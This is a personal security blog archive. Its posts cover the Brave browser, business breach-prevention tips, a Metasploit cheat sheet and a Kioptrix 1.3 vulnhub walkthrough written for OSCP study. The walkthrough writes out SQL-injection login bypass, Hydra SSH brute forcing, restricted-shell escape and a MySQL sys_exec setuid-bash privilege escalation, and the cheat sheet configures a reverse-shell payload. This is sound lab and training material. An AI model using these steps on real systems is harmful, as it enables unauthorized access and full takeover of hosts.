Just In Time, the Brave Browser Becomes My Default

Last night I saw a respected security professional I follow on Twitter mention the Brave web browser, and how good he thought the mobile version is. Brave was started by the Mozilla Project co-founder Brandon Eich, and is based on Chromium, the open-source base that Google Chrome is constructed upon.

Today, I caught wind that Chrome is soon going to prevent you from doing things such as disabling its DRM management feature called Widevine. The problem with this is summarized here:

…a single browser may now require two different DRM plugins to play all DRM content. These plugins have their own security issues, but unlike with the Flash vulnerabilities, security researchers are banned from looking for them, due to Section 1201 of the Digital Millennium Copyright Act (DMCA). That means malicious hackers, who already engage in other criminal activities, may freely take advantage of all the vulnerabilities they find in these DRM plugins before companies discover them on their own.

In short, because of the closed nature of the DMCA, we end users are at risk unnecessarily, and we will soon have no ability to disable this plugin should we wish to do so.

Enter The Brave

Brave offers a browser that works on all platforms (Windows, Mac, Linux) and on mobile. It blocks ads by default, blocks malware, and is lean and fast. Putting user privacy and security at the forefront, along with speed, this thing is a powerhouse as it forces https on websites and prevents malware-serving advertisement networks from invading your workspace.

But the difference is the paradigm shift in supporting advertisers, as opposed to simply blocking them out completely:

Brave intends to keep 15% of ad revenue for itself, pay content publishers 55%, ad partners 15% and also give 15% to the browser users, who can in turn donate to bloggers and other providers of web content through micropayments.

I have yet to figure out how or if that will work, exactly, and it doesn’t seem to be fully impemented in the browser yet, but it seems like a great way to solve the elephant-in-the-room problem the Internet faces today: how to earn money and keep users safe at the same time, so that they don’t need to run ad blockers and anti-tracking plugins?

Stay tuned for more info as I learn it, and as I figure out Brave.

Read Now If Your Employees Are Using 123RandomWord As Their Password

Ever since the internet rose up from the mists of nowhere, security breaches have been a source of big news, terrifying news. Whether it is the likes of Yahoo being hacked, or Election Results being tampered with, hacking scandals seem to be rearing their ugly heads more often than not. We read story after story about security leaks and each one ends with the same paragraph, the same foregone conclusion; businesses and business leaders need to up their game when it comes to protecting the sensitive data they hold. That is the common message from security experts, and yet so many businesses still don’t prepare themselves properly. Because they have been targeted and affected, they don’t take it seriously enough to seek out the weak links in their business, research the most recent trend in threats, and thus fail to protect themselves and their clients/customers from any breach.

Don’t believe us? Well, the recent State of Risk report concluded that a majority of businesses – big and small – have not invested in a system that will protect, control and track the sensitive data they have been entrusted with. The majority have no or only a partial, system in place. Trust us, if Yahoo is struggling to hold their defensive line against hackers then, chances are, you are going to struggle too. That’s why it is imperative to invest in security. Put it this way, the average cost incurred by a cyber breach on a small or medium sized business is £325,000.

I thought that would grab your attention.

So what preventative measures can you take? How do you best protect yourself and your customers? How do you make sure you are doing all you can to prevents a security breach? How do you stop your sensitive data getting into the wrong hands? Well, we have conducted thorough interviews with security experts to hear what they say, and have compiled a list of the most common areas of weakness in most businesses.

  1. On The Go Tech

In the early 90s and before, a data hack would mean someone would have to hack into your servers or break into your premises in order to access your sensitive data. But these days are gone, and data theft has been made so much simpler by the rise in mobile technology. Simply put, mobile devices increase your vulnerability and thus increase the risk. Of course, mobile devices are a must-have for all employees these days because it increases flexibility and productivity, and reduces the issue of wasted time and resource. However, the more your employees use these devices to share data and access your servers or fail to change their passwords, the more risk you are at. In fact, mobile breaches account for almost three-quarters of all breaches, a rise that mimics the rise of the bring your device to work policy that so many companies are embracing.

As such, it is imperative that you renew your BYOD policy so that it carefully spells out certain rules and expectations. This will better educate your workforce on the risks. A great way to make this more effective is to relate security breaches at work to the risks they face at home; make it relatable to personal risks like using ATM machines. You should also ensure that you have the capabilities to better monitor mobile devices. This way you will be able to quickly pinpoint any breach or any weakness.

  1. Uneducated Employees

We don’t mean uneducated in terms of schooling, we mean uneducated regarding security, and that means your training program is letting them down. But, yes, all too often your employees are a security risk. It could be that employee leaves their laptop on a table in Costa as they nip to the bathroom, or a smartphone gets left on the subway, or in a taxi. All of these pose serious threats to your security. But it is not just about exposure outside the office. Too many employees are not educated on the importance of a strong password, what constitutes a strong password or how often they should change their password. This leaves you exposed on the inside. The same goes for training on what to look out for when it comes to suspicious emails.

Cyber attacks have got more and more sophisticated. The phishing techniques have improved, spear fishing is now called upon, unauthorized websites are now able to install malware without the user knowing, and all of these pose a serious threat to both your systems and your data. That is why training is so important, and regular training too, as this will allow you to renew their understanding as different trends arise. A great way to do this is to approach digital learning companies who have experience in this kind of training. This will offer you a cost-effective means of training that is not just interactive and engaging but offers an audit trail too. They will know how to teach your employees about passwords, phishing, keylogging and much more.

  1. Inside Jobs

It is hard to say exactly where an internal attack originates, but it is typically unhappy or disgruntled employees. What’s more, these account for a seriously high number of breaches. Of course, any inside attack will require in-depth knowledge of your IT systems and will require someone to have access to all areas of your network, which is why most inside attacks come from within the IT Department. A disgruntled employee working within IT support can create a huge amount of problems.

How you can prevent this weakness is a challenge, but it requires mitigating any chance of employees in this sector becoming disgruntled. This is not always possible, so it is crucial you identify all those that have access to all areas of the server, this way you will be able to act quickly should an event happen. Another step should be to terminate access to anyone that no longer works within this capacity as soon as possible.

  1. The Cloud

The most effective way to protect all data that is stored in the cloud is to encrypt any access at ground level. Different experts suggest different encryption software, but all suggestions usually represent the gold standard in this field. We can’t stress enough the importance of investing in this kind of security. Since the cloud first originated, a high proportion of cyber attacks have been made possible by companies not using data level encryption devices to protect data stored up high, so make sure you invest well and invest fast.

  1. Third Parties

There are a few reasons why outsourcing has become more and more attractive. It is cost-effective, it frees up resource time, it allows experts to address what is becoming a more and more complex area. It could be you outsource the maintenance of your server, or your point of sale system, or a myriad of other things. However, while they may be experts in protecting you, third-party providers sometimes don’t follow best-practices themselves. It may be they use one password to connect to all of their clients, for example, which poses a threat should that password be hacked.
As such, you should always ask as many questions as you possibly can. Make sure they follow the best practices of remote access security, and enforce stringent policies for their workforce to uphold, and use sophisticated authentication techniques to ensure there are unique credentials required for each user. The other step you must take is to know which third parties you are using and then terminate their access as soon as their contract runs out or as soon as they no longer require access.

Quick Metasploit Guide

metasploit photoThese are some notes I find myself referring back to as I work through my studies for the OSCP exam. As I develop more of these, I’ll continue to post them here on my blog so that others might find them useful.

Use Kali Linux for all the following instructions.

Prep:
Ensure postgresql is running.

$> /etc/init.d/postgresql start

Set postgres to start on boot so you don’t have to worry about it again:
$> sudo update-rc.d postgresql enable

From the command line, fire up the Metasploit console:
$> msfconsole

Search for exploits related to what you are interested in:
msf> search smb

Or, be more specific:
msf> search name:smb type:exploit platform:windows

Or, in Kali, use searchsploit (from regular command line, outside of MSF):
$> searchsploit smb

Once you find an exploit you want to use, use it:
msf> use exploit/windows/smb_hack

Then set a payload:
msf> set PAYLOAD windows/shell/reverse_tcp

See what options are set:
msf> show options

Set options as needed:

LHOST is the IP of where the victim host will send info to (your Kali VM, ex.)

msf> set LHOST 192.168.0.x

RHOST is the IP of the victim
msf> set RHOST 192.168.1.x

Default port is 80, but choose one if you wish:
msf> set RPORT 8081

Run the exploit:
msf> exploit

If trying to get a remote shell, beware that you may be looking at it if you see what you think is nothing happening. Just try executing a command and see what happens:
ls

dir

pwd

id

Photos by Christiaan008,

Kioptrix Level 1.3 (VM #4) Walkthrough

In my efforts to self-study in preparation for the OSCP certification later this year, I’ve been going through some of the intentionally vulnerable Virtual Machines (VMs) on vulnhub.com to sharpen and broaden my penetration testing and hacking skills. Among others I’ve completed, the Kioptrix series of VMs is allegedly similar to what you see in the actual OSCP test, so I’ve been going through them in order.

Part of completing the OSCP is providing a write-up of your hacking adventures to explain how and what you did to hack a server, so I figured I better start now. Other folks do similar write-ups on the VMs on vulnub.com, and I’ll see if they will add this to Kioptrix 1.3 page soon.

Hopefully, someone will find this useful either way.

It should be noted that this VM was known to have at least two possible paths to getting root on the system, and this writeup outline just one.

Discovery

On my local network, this VM turned up with the IP address of 192.168.0.110.

nmap

Running an nmap scan revealed some open ports and running services:

root@kali:~# nmap -v -sS -A -T4
PORT STATE SERVICE VERSION
22/tcp open ssh OpenSSH 4.7p1 Debian 8ubuntu1.2 (protocol 2.0)
| ssh-hostkey: 
| 1024 9b:ad:4f:f2:1e:c5:f2:39:14:b9:d3:a0:0b:e8:41:71 (DSA)
|_ 2048 85:40:c6:d5:41:26:05:34:ad:f8:6e:f2:a7:6b:4f:0e (RSA)
80/tcp open http Apache httpd 2.2.8 ((Ubuntu) PHP/5.2.4-2ubuntu5.6 with Suhosin-Patch)
| http-methods: 
|_ Supported Methods: GET HEAD POST OPTIONS
|_http-server-header: Apache/2.2.8 (Ubuntu) PHP/5.2.4-2ubuntu5.6 with Suhosin-Patch
|_http-title: Site doesn't have a title (text/html).
139/tcp open netbios-ssn Samba smbd 3.X - 4.X (workgroup: WORKGROUP)
445/tcp open netbios-ssn Samba smbd 3.0.28a (workgroup: WORKGROUP)

Running: Linux 2.6.X
OS CPE: cpe:/o:linux:linux_kernel:2.6
OS details: Linux 2.6.9 - 2.6.33

Poking Around

Checking things out by hand based on the nmap scan results, I found there was a login page running on port 80 at http://192.168.0.110

No basic SQL injection working from any initial attempts.

Nothing in the source code of note. Some other basic manual fuzzing and poking around didn’t reveal much either.

Nikto

Nikto turned up some basic stuff about Apache that I thought might be worth looking into later:

Server: Apache/2.2.8 (Ubuntu) PHP/5.2.4-2ubuntu5.6 with Suhosin-Patch
+ Retrieved x-powered-by header: PHP/5.2.4-2ubuntu5.6
+ PHP/5.2.4-2ubuntu5.6 appears to be outdated (current is at least 5.6.9). PHP 5.5.25 and 5.4.41 are also current.
+ Apache/2.2.8 appears to be outdated (current is at least Apache/2.4.12). Apache 2.0.65 (final release) and 2.2.29 are also current.

dirb and dirsearch

A basic dirb scan turned up a directory:
http://192.168.0.110/john/

I though that could be a username. Running dirb with a bigger wordlist (big.txt in Kali) turned up another one:
http://192.168.0.110/robert/

Both of those directories contained a file (robert.php and john.php) that, when clicked, would just redirect you back to the main login page.

I also ran DIRSEARCH, a python tool that also works well for finding directories and files.
found file: database.sql

(Note: Dirsearch is not included in Kali by default. Requires you to setup Python 3 in a virtual environment to run it.)

enum4linux

Since ports 139 and 445 were being used, I went on try enum4linux

root@kali:~# enum4linux -a 192.168.0.110
Starting enum4linux v0.8.9 ( http://labs.portcullis.co.uk/application/enum4linux/ ) on Thu Feb 9 00:40:35 2017

<em>(Pasting only the relevant stuff here.)</em>
 ===================================================== 
| Enumerating Workgroup/Domain on 192.168.0.110 |
 ===================================================== 
[+] Got domain/workgroup name: WORKGROUP

============================================= 
| Nbtstat Information for 192.168.0.110 |
 ============================================= 
Looking up status of 192.168.0.110
 KIOPTRIX4 &lt;00&gt; - B &lt;ACTIVE&gt; Workstation Service
 KIOPTRIX4 &lt;03&gt; - B &lt;ACTIVE&gt; Messenger Service
 KIOPTRIX4 &lt;20&gt; - B &lt;ACTIVE&gt; File Server Service
 ..__MSBROWSE__. &lt;01&gt; - &lt;GROUP&gt; B &lt;ACTIVE&gt; Master Browser
 WORKGROUP &lt;1d&gt; - B &lt;ACTIVE&gt; Master Browser
 WORKGROUP &lt;1e&gt; - &lt;GROUP&gt; B &lt;ACTIVE&gt; Browser Service Elections
 WORKGROUP &lt;00&gt; - &lt;GROUP&gt; B &lt;ACTIVE&gt; Domain/Workgroup Name

MAC Address = 00-00-00-00-00-00

============================== 
| Users on 192.168.0.110 |
 ============================== 
index: 0x1 RID: 0x1f5 acb: 0x00000010 Account: nobody Name: nobody Desc: (null)
index: 0x2 RID: 0xbbc acb: 0x00000010 Account: robert Name: ,,, Desc: (null)
index: 0x3 RID: 0x3e8 acb: 0x00000010 Account: root Name: root Desc: (null)
index: 0x4 RID: 0xbba acb: 0x00000010 Account: john Name: ,,, Desc: (null)
index: 0x5 RID: 0xbb8 acb: 0x00000010 Account: loneferret Name: loneferret,,, Desc: (null)

user:[nobody] rid:[0x1f5]
user:[robert] rid:[0xbbc]
user:[root] rid:[0x3e8]
user:[john] rid:[0xbba]
user:[loneferret] rid:[0xbb8]

========================================== 
| Share Enumeration on 192.168.0.110 |
 ========================================== 
WARNING: The "syslog" option is deprecated
Domain=[WORKGROUP] OS=[Unix] Server=[Samba 3.0.28a]
Domain=[WORKGROUP] OS=[Unix] Server=[Samba 3.0.28a]

Sharename Type Comment
 --------- ---- -------
 print$ Disk Printer Drivers
 IPC$ IPC IPC Service (Kioptrix4 server (Samba, Ubuntu))

Server Comment
 --------- -------
 KIOPTRIX4 Kioptrix4 server (Samba, Ubuntu)

Workgroup Master
 --------- -------
 WORKGROUP KIOPTRIX4

[+] Attempting to map shares on 192.168.0.110
//192.168.0.110/print$ Mapping: DENIED, Listing: N/A
//192.168.0.110/IPC$ [E] Can't understand response:
WARNING: The "syslog" option is deprecated
Domain=[WORKGROUP] OS=[Unix] Server=[Samba 3.0.28a]
NT_STATUS_NETWORK_ACCESS_DENIED listing \*

===================================================== 
| Password Policy Information for 192.168.0.110 |
 ===================================================== 
[E] Unexpected error from polenum:
Traceback (most recent call last):
 File "/usr/bin/polenum", line 33, in &lt;module&gt;
 from impacket.dcerpc import dcerpc_v4, dcerpc, transport, samr
ImportError: cannot import name dcerpc_v4
[+] Retieved partial password policy with rpcclient:

Password Complexity: Disabled
Minimum Password Length: 0

S-1-22-1-1000 Unix User\loneferret (Local User)
S-1-22-1-1001 Unix User\john (Local User)
S-1-22-1-1002 Unix User\robert (Local User)

enum4linux complete on Thu Feb 9 00:40:51 2017

acccheck

I ran acccheck on the ‘robert’ user with the big.txt pw list, to no avail. Can circle back to try the other usernames if needed.

THC Hydra

You can use Hydra to brute force FTP, SSH, POP3, and SMTP account. Let’s try Hydra with those usernames to find SSH accounts! Trying the usernames found via acccheck with SSH logins:

robert
root
loneferret
john

hydra -L users -P 10_million_password_list_top_100000.txt -t 4 192.168.0.110 ssh -vv

Nothing turned up! Bummer.

database.sql

This was found during discover with dirsearch, and it appears to be a short MySQL dump file. Since other avenues were turning out to be fruitless, I thought I’d give this a closer look.

Immediately, the first thing to note is that there’s a username and password shown in the dump file.

john
1234

Let’s try it on the HTML login form at http://192.168.0.110/index.php?. No luck!
I thought maybe that was a default password, so I tested it on the other known users as well (robert, root, loneferret), but still no luck.

Perhaps it’d work with SSH or SMB?
Negatory

The file at least led me to believe MySQL was in place, so perhaps some more SQLi exploration would help.

After a number of failed attempts and errors by trying various SQL injection strings, using this worked:

Username: john
Password: ' OR 1=1 #

That took me to the User Admin Panel and showed the actual password.

That seemed kinda easy. But this is when things got hard, actually.

I logged out and confirmed that the password worked. It logged me back into that same page. But what good is that? Let’s try SSH again!

Shell obtained. However, the shell seemed to be extremely limited. As instructed at login, typing ? or ‘help’ gets you a list of allowed commands:

I was warned about trying to cd into the root directory, and getting kicked out if I tried again.

lpath is the same as pwd.

The only available command that looks somewhat useful is echo. Let’s see if we can echo the contents of .profile


Uh oh. It really did kick me out! Luckily, all I had to do was reconnect via SSH. Let’s try a different file:

Bummer. How about getting around now that we know it is possible to simply re-log via SSH if you get kicked out? No luck.

Must break out of the restricted “LigGoat” shell. To the Google!

Searching for “escape restricted shell echo” I found a handy article:
https://pen-testing.sans.org/blog/2012/06/06/escaping-restricted-linux-shells

Trying a number of things, I finally found the right trick, which is to use Python to switch shells:

echo os.system("/bin/bash")

That was weird, but it worked, and I got a less restricted shell. This website was of much help to find the specific command needed: http://netsec.ws/?p=337

Finally, a useful shell. Well, more useful. It still seems to be a basic user account with no real privileges. So where to next? MySQL exists and can be leveraged to take over a box under the right circumstances, so before exploring other vectors, I decided to start with it.

MySQL

Revisiting the web directory and the application running on the website, I found a handy SQL statement in checklogin.php. This statement had the mysql connection string, including the username and password, which were simply:

user: root
pass: (empty)

That suggested the root password was never changed when MySQL was installed, so this was probably a default installation with few tweaks or security enhancements. Sure enough, I was able to log in:

Things got off track for a while here, as I wasn’t really sure what to do from this point. However, this Google search helped me:

mysql root pwn server

That led me to a Facebook post, of all things:

https://www.facebook.com/notes/security-training-share/mysql-root-to-system-root-with-lib_mysqludf_sys-for-windows-and-linux/865458806817957/

It described the situation perfectly:

“We may have MySQL root access but not system root access for a number of reasons including having a shell account on the target whilst MySQL’s root user has been left unpassworded by default, or alternatively gaining access via SQL injection through a web application connecting to the database as root, which is something I see far too often.”

The necessary lib file was already at /usr/lib/lib_mysqludf_sys.so which meant I didn’t need to grab it from sqlmap and upload it to the system.

Modifying those instructions a little, there was no need to compile a c script (which I was unable to do as user ‘john’ anyway.

Where that article has this line:

select sys_exec('id &gt; /tmp/out; chown npn.npn /tmp/out');

Just do this instead:
select sys_exec('chmod u+s /bin/bash');

Then drop out of MySQL and run this:
bash -p

It should drop you into a root shell!
cd /root

cat congrats.txt
It described the situation perfectly:
"We may have MySQL root access but not system root access for a number of reasons including having a shell account on the target whilst MySQL’s root user has been left unpassworded by default, or alternatively gaining access via SQL injection through a web application connecting to the database as root, which is something I see far too often."

The necessary lib file was already at /usr/lib/lib_mysqludf_sys.so which meant I didn't need to grab it from sqlmap and upload it to the system.

Modifying those instructions a little, there was no need to compile a c script that changes users.

Instead of this line:
select sys_exec('id &gt; /tmp/out; chown npn.npn /tmp/out');

Just do this:
select sys_exec('chmod u+s /bin/bash');

Then drop out of MySQL and run this:

  Ø bash -p

It should drop you into a root shell!

cd /root

cat congrats.txt

Root obtained. Mission complete!

 

Let’s Revisit: Sending Mass Emails The Right Way

envelopes photoThe concept of sending an email to multiple people the right way seems to have eluded the populace as a whole lately. I’m looking at you, schoolteachers, soccer coaches, and party invitation senders. I write to you today because, in recent months, it seems I’ve been included on more and more emails where I’m one of 50 people whose email address is awkwardly stuffed into the CC: field of the email you sent, right there with all the others for everyone in the list to see. I even got an email from the manager of the local Sears store I had recently purchased an appliance from, that got sent to all the people who had bought something there recently, and everyone’s name and address were easily viewable in the CC field.

The problem here is that you are being inconsiderate towards peoples’ privacy, and you are sending around a large list of real email addresses to possibly be harvested by spammers.

There is a way to do this that protects peoples’ privacy, doesn’t annoy the nerds and geeks in your email list, and makes you look like you know what you are doing. What trifecta could be better than that?

The easiest way to do this is by using the BCC: field instead of the CC: field. BCC stands for “Blind carbon copy,” which means that any email address entered in it will not show up to the recipients of the email. The CC: field does show them, so don’t use it.

The trick is that you should enter your own email address in the To: field of the email, then enter the long list of room parents or party invitees in the BCC field. That’s it! Now you too can look cool.

There are some detailed instructions, with pictures, available here, in case you need more info.

WordPress Security from WordCamp Asheville 2016

One of the coolest things about WordCamp is that they post videos of each talk and presentation on WordPress.tv for viewing afterwards. It give you the chance to see all the great presentations you may have missed, or to revisit the ones you attended.

With so many WordCamps happening all over the world, it is a great resource.

My presentation from WordCamp Asheville 2016, titled WordPress Security: Don’t Be a Target, is now live on WordPress.tv.